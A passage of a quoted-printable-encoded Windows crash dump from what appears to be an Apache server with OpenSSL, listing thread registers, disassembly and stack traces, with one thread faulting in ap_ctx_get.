        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0257FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0257FF78 6FF6B62A 00000017 780060CE 00000017 0012FFB0 =
kernel32!WaitForSingleObject=20
0257FFB4 77E96523 005A6210 0012FFB0 0012FFB0 005A6210 !ap_start_restart =

0257FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x604

eax=3D0412a080 ebx=3D00000000 ecx=3D0061d100 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0267fee4 ebp=3D0267ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:030fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:0109a6d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0267FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0267FF78 6FF6B62A 00000018 780060CE 00000018 0012FFB0 =
kernel32!WaitForSingleObject=20
0267FFB4 77E96523 005A6298 0012FFB0 0012FFB0 005A6298 !ap_start_restart =

0267FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x5d8

eax=3D0277fb0c ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0277fee4 ebp=3D0277ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:031fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0277FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0277FF78 6FF6B62A 00000019 780060CE 00000019 0012FFB0 =
kernel32!WaitForSingleObject=20
0277FFB4 77E96523 005D6560 0012FFB0 0012FFB0 005D6560 !ap_start_restart =

0277FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4ac

eax=3D00000000 ebx=3D00000000 ecx=3D00000003 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0287fee4 ebp=3D0287ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:032fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d5=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0287FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0287FF78 6FF6B62A 0000001A 780060CE 0000001A 0012FFB0 =
kernel32!WaitForSingleObject=20
0287FFB4 77E96523 005D65E8 0012FFB0 0012FFB0 005D65E8 !ap_start_restart =

0287FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x5e4

eax=3D00000001 ebx=3D00000000 ecx=3D0297f008 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0297fee4 ebp=3D0297ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:033fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:033fc5da=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0297FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0297FF78 6FF6B62A 0000001B 780060CE 0000001B 0012FFB0 =
kernel32!WaitForSingleObject=20
0297FFB4 77E96523 005D6670 0012FFB0 0012FFB0 005D6670 !ap_start_restart =

0297FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x5dc

eax=3D00000000 ebx=3D00000000 ecx=3Dfffffffe edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D02a7fee4 ebp=3D02a7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:034fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d0=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
02A7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
02A7FF78 6FF6B62A 0000001C 780060CE 0000001C 0012FFB0 =
kernel32!WaitForSingleObject=20
02A7FFB4 77E96523 005D66F8 0012FFB0 0012FFB0 005D66F8 !ap_start_restart =

02A7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x5bc

eax=3D00000001 ebx=3D00566a00 ecx=3D0062881c edx=3De002be9c =
esi=3D006287a0 edi=3D0000000c
eip=3D00685ff6 esp=3D02b7f8f8 ebp=3D00567b70 iopl=3D0         nv up ei =
pl nz na pe nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000202


function: BN_from_montgomery
        00685fe0 4e               dec     esi
        00685fe1 75f5             jnz     des_encrypt1+0x258 (0068ebd8)
        00685fe3 8b74241c         mov     esi,[esp+0x1c]         =
ss:035fcecb=3D????????
        00685fe7 56               push    esi
        00685fe8 55               push    ebp
        00685fe9 e852faffff       call    BN_ucmp (00685a40)
        00685fee 83c408           add     esp,0x8
        00685ff1 85c0             test    eax,eax
        00685ff3 7c0b             jl      CAST_set_key+0xdd0 (0068b600)
        00685ff5 56               push    esi
        00685ff6 55               push    ebp
        00685ff7 55               push    ebp
        00685ff8 e843b3ffff       call    BN_usub (00681340)
        00685ffd 83c40c           add     esp,0xc
        00686000 c744241401000000 mov   dword ptr [esp+0x14],0x1 =
ss:035fcecb=3D????????
        00686008 8b442430         mov     eax,[esp+0x30]         =
ss:035fcecb=3D????????
        0068600c 50               push    eax
        0068600d e8bed1ffff       call    BN_CTX_end (006831d0)
        00686012 8b442418         mov     eax,[esp+0x18]         =
ss:035fcecb=3D????????
        00686016 83c404           add     esp,0x4
        00686019 5f               pop     edi
        0068601a 5e               pop     esi

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
02B7F8F4 006287A0 00567B84 00567B58 00000005 00000000 =
!BN_from_montgomery=20
00567B70 00000010 00000040 00000000 00000000 04027BC0 =20

*----> Raw Stack Dump <----*
02b7f8f8  a0 87 62 00 84 7b 56 00 - 58 7b 56 00 05 00 00 00  =
..b..{V.X{V.....
02b7f908  00 00 00 00 00 6a 56 00 - 70 2c 04 04 0c 00 00 00  =
.....jV.p,......
02b7f918  a0 87 62 00 b5 5d 68 00 - 70 7b 56 00 70 c2 ad 03  =
..b..]h.p{V.p...
02b7f928  5f 0f 18 9e 58 7b 56 00 - 0e 00 00 00 05 00 00 00  =
_...X{V.........
02b7f938  04 00 00 00 5e 3f 68 00 - 70 7b 56 00 70 7b 56 00  =
....^?h.p{V.p{V.
02b7f948  9c fa b7 02 88 87 62 00 - 58 7b 56 00 00 97 56 00  =
......b.X{V...V.
02b7f958  ac fc b7 02 d0 8f 56 00 - 58 7b 56 00 88 87 62 00  =
......V.X{V...b.
02b7f968  05 01 00 00 00 00 00 00 - 05 00 00 00 70 7b 56 00  =
............p{V.
02b7f978  10 00 00 00 00 00 00 00 - 8c 87 62 00 80 66 62 00  =
..........b..fb.
02b7f988  10 00 00 00 40 00 00 00 - 00 00 00 00 00 00 00 00  =
....@...........
02b7f998  08 00 0b 04 10 00 00 00 - 21 00 00 00 00 00 00 00  =
........!.......
02b7f9a8  00 00 00 00 50 08 fc 03 - 10 00 00 00 21 00 00 00  =
....P.......!...
02b7f9b8  00 00 00 00 00 00 00 00 - 38 01 0b 04 10 00 00 00  =
........8.......
02b7f9c8  21 00 00 00 00 00 00 00 - 00 00 00 00 70 2f 00 04  =
!...........p/..
02b7f9d8  10 00 00 00 21 00 00 00 - 00 00 00 00 00 00 00 00  =
....!...........
02b7f9e8  20 b1 05 04 10 00 00 00 - 21 00 00 00 00 00 00 00   =
.......!.......
02b7f9f8  00 00 00 00 30 7c fb 03 - 10 00 00 00 21 00 00 00  =
....0|......!...
02b7fa08  00 00 00 00 00 00 00 00 - 78 67 56 00 10 00 00 00  =
........xgV.....
02b7fa18  21 00 00 00 00 00 00 00 - 00 00 00 00 68 02 0b 04  =
!...........h...
02b7fa28  10 00 00 00 21 00 00 00 - 00 00 00 00 00 00 00 00  =
....!...........

State Dump for Thread Id 0x5b8

eax=3D041169c0 ebx=3D00000000 ecx=3D04116998 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D02c7fee4 ebp=3D02c7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:036fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04b93f6a=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
02C7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
02C7FF78 6FF6B62A 0000001E 780060CE 0000001E 0012FFB0 =
kernel32!WaitForSingleObject=20
02C7FFB4 77E96523 005D6808 0012FFB0 0012FFB0 005D6808 !ap_start_restart =

02C7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x5f4

eax=3D00000000 ebx=3D00000000 ecx=3D00001086 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D02d7fee4 ebp=3D02d7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:037fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7e658=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
02D7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
02D7FF78 6FF6B62A 0000001F 780060CE 0000001F 0012FFB0 =
kernel32!WaitForSingleObject=20
02D7FFB4 77E96523 005D6890 0012FFB0 0012FFB0 005D6890 !ap_start_restart =

02D7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4b0

eax=3D0064b520 ebx=3D00000000 ecx=3D00652400 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D02e7fee4 ebp=3D02e7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:038fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:010cf9d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
02E7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
02E7FF78 6FF6B62A 00000020 780060CE 00000020 0012FFB0 =
kernel32!WaitForSingleObject=20
02E7FFB4 77E96523 005D6918 0012FFB0 0012FFB0 005D6918 !ap_start_restart =

02E7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x59c

eax=3D00000030 ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D02f7fee4 ebp=3D02f7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:039fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
02F7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
02F7FF78 6FF6B62A 00000021 780060CE 00000021 0012FFB0 =
kernel32!WaitForSingleObject=20
02F7FFB4 77E96523 005D69A0 0012FFB0 0012FFB0 005D69A0 !ap_start_restart =

02F7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x57c

eax=3D03f8e26f ebx=3D00000000 ecx=3D03f8df47 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0307fee4 ebp=3D0307ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:03afd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04a0b519=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0307FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0307FF78 6FF6B62A 00000022 780060CE 00000022 0012FFB0 =
kernel32!WaitForSingleObject=20
0307FFB4 77E96523 005D6A28 0012FFB0 0012FFB0 005D6A28 !ap_start_restart =

0307FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x580

eax=3D00511f18 ebx=3D00000000 ecx=3D00000004 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0317fee4 ebp=3D0317ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:03bfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d6=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0317FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0317FF78 6FF6B62A 00000023 780060CE 00000023 0012FFB0 =
kernel32!WaitForSingleObject=20
0317FFB4 77E96523 005D6AB0 0012FFB0 0012FFB0 005D6AB0 !ap_start_restart =

0317FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x6b0

eax=3D00000000 ebx=3D00000001 ecx=3D00000000 edx=3D04336aa8 =
esi=3D6ff8f930 edi=3D000005b8
eip=3D6ff8f938 esp=3D0327dc9c ebp=3D042eafe0 iopl=3D0         nv up ei =
pl nz na pe nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000202


function: ap_ctx_get
        6ff8f930 8b442404         mov     eax,[esp+0x4]          =
ss:03cfb26f=3D????????
        6ff8f934 53               push    ebx
        6ff8f935 55               push    ebp
        6ff8f936 56               push    esi
        6ff8f937 57               push    edi
FAULT ->6ff8f938 8b7804           mov     edi,[eax+0x4]          =
ds:00a7d5d2=3D????????
        6ff8f93b 33ed             xor     ebp,ebp
        6ff8f93d 897c2414         mov     [esp+0x14],edi         =
ss:03cfb26f=3D????????
        6ff8f941 8b07             mov     eax,[edi]              =
ds:000005b8=3D????????
        6ff8f943 85c0             test    eax,eax
        6ff8f945 7440             jz      regexec+0x23a7 (6ff98487)
        6ff8f947 8b542418         mov     edx,[esp+0x18]         =
ss:03cfb26f=3D????????
        6ff8f94b 8b00             mov     eax,[eax]              =
ds:00000000=3D????????
        6ff8f94d 8bf2             mov     esi,edx
        6ff8f94f 8a18             mov     bl,[eax]                     =
ds:00000000=3D??
        6ff8f951 8acb             mov     cl,bl
        6ff8f953 3a1e             cmp     bl,[esi]                     =
ds:6ff8f930=3D8b

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
042EAFE0 00000000 00000000 00000000 00000000 00000000 !ap_ctx_get=20

*----> Raw Stack Dump <----*
0327dc9c  b8 05 00 00 30 f9 f8 6f - e0 af 2e 04 01 00 00 00  =
....0..o........
0327dcac  ca 60 00 10 00 00 00 00 - e0 68 01 10 b8 5b 0e 04  =
.`.......h...[..
0327dcbc  68 f4 5e 00 01 00 00 00 - 13 65 00 10 b8 5b 0e 04  =
h.^......e...[..
0327dccc  68 f4 5e 00 00 10 00 00 - d8 e9 51 00 18 f4 5e 00  =
h.^.......Q...^.
0327dcdc  68 f4 5e 00 01 00 00 00 - 00 00 00 00 33 27 00 00  =
h.^.........3'..
0327dcec  b8 5b 0e 04 0f 00 00 00 - 00 00 00 00 01 00 00 00  =
.[..............
0327dcfc  30 06 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
0...............
0327dd0c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0327dd1c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0327dd2c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0327dd3c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00  =
................
0327dd4c  00 00 00 00 07 50 e8 77 - 58 05 00 00 00 00 00 00  =
.....P.wX.......
0327dd5c  07 50 e8 77 58 05 00 00 - 00 00 00 00 18 f4 5e 00  =
.P.wX.........^.
0327dd6c  1c df 27 03 a4 dd 27 03 - cc de 27 03 00 20 00 00  =
..'...'...'.. ..
0327dd7c  00 00 00 00 01 00 00 00 - c0 b6 03 78 6c 00 00 00  =
...........xl...
0327dd8c  cc de 27 03 00 00 00 00 - 00 00 00 00 11 00 00 c0  =
..'.............
0327dd9c  00 00 00 00 00 00 00 00 - 11 00 00 c0 00 00 00 00  =
................
0327ddac  01 00 00 00 20 de 27 03 - 84 dd 27 03 01 00 00 00  .... =
.'...'.....
0327ddbc  2c de 27 03 3c d4 e9 77 - 38 50 e8 77 ff ff ff ff  =
,.'.<..w8P.w....
0327ddcc  00 de 27 03 e9 de 01 78 - 58 05 00 00 cc de 27 03  =
..'....xX.....'.

State Dump for Thread Id 0x624

eax=3D0000000d ebx=3D00000000 ecx=3D000001f8 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0337fee4 ebp=3D0337ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:03dfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d7ca=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0337FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0337FF78 6FF6B62A 00000025 780060CE 00000025 0012FFB0 =
kernel32!WaitForSingleObject=20
0337FFB4 77E96523 005D6BC0 0012FFB0 0012FFB0 005D6BC0 !ap_start_restart =

0337FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x558

eax=3D00000000 ebx=3D00000000 ecx=3D01000101 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0347fee4 ebp=3D0347ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:03efd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:01a7d6d3=3D531ba86f
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
